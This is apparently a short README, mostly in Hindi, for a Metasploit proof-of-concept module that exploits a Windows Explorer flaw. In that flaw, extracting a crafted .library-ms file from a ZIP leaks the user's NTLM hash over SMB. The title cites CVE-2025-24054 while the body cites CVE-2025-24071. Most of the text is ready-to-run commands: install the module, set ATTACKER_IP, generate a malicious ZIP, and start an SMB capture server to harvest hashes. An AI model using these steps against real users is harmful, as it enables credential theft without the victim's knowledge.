
POC for CVE-2025-24054
इस रिपॉजिटरी में एक Metasploit मॉड्यूल है जो CVE-2025-24071 का शोषण करने के लिए है, जो Windows Explorer में एक भेद्यता है जो एक दुर्भावनापूर्ण .library-ms फ़ाइल को ZIP आर्काइव से निकालने पर NTLM हैश को लीक करती है।
द्वारा विकसित: FOLKS-IWD
यह भेद्यता तब होती है जब कोई उपयोगकर्ता एक ZIP आर्काइव निकालता है जिसमें विशेष रूप से तैयार किया गया .library-ms फ़ाइल होती है। Windows Explorer स्वचालित रूप से फ़ाइल में निर्दिष्ट रिमोट सर्वर पर SMB प्रमाणीकरण अनुरोध शुरू करता है, जिससे उपयोगकर्ता की किसी भी अंतःक्रिया के बिना उसका NTLM हैश लीक हो जाता है।
यह Metasploit मॉड्यूल:
.library-ms फ़ाइल उत्पन्न करता है।
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run